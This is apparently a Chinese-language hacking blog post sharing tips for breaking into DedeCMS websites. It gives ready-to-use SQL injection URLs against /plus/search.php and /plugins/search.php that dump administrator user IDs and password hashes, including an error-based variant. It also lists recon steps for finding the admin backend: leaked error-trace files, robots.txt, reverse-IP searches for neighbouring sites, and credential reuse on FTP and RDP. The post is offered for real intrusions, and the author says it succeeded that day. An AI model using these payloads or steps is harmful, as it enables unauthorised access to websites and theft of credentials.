入侵dedecms站 找后台的一些小经验分享

首先:
注入exp
有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`%23@__admin`%23@`\’`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`%23@__admin`%23@`\’`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+
(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT
(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))
a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补

第二 个 域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后

http://www.bing.com/
搜索 ip:127.0.0.1 php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的

第四 个 查看 robots.txt
http://www.dedecms.com/robots.txt 查看旁注站dedecms的站 再去社工目标站的后台地址也可以

第五 个 注入exp得到账号 去社工 ftp 和 3389密码

至少今天我都有成功过

欢迎机友一起分享经验 欢迎 总结 补充

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/2740.html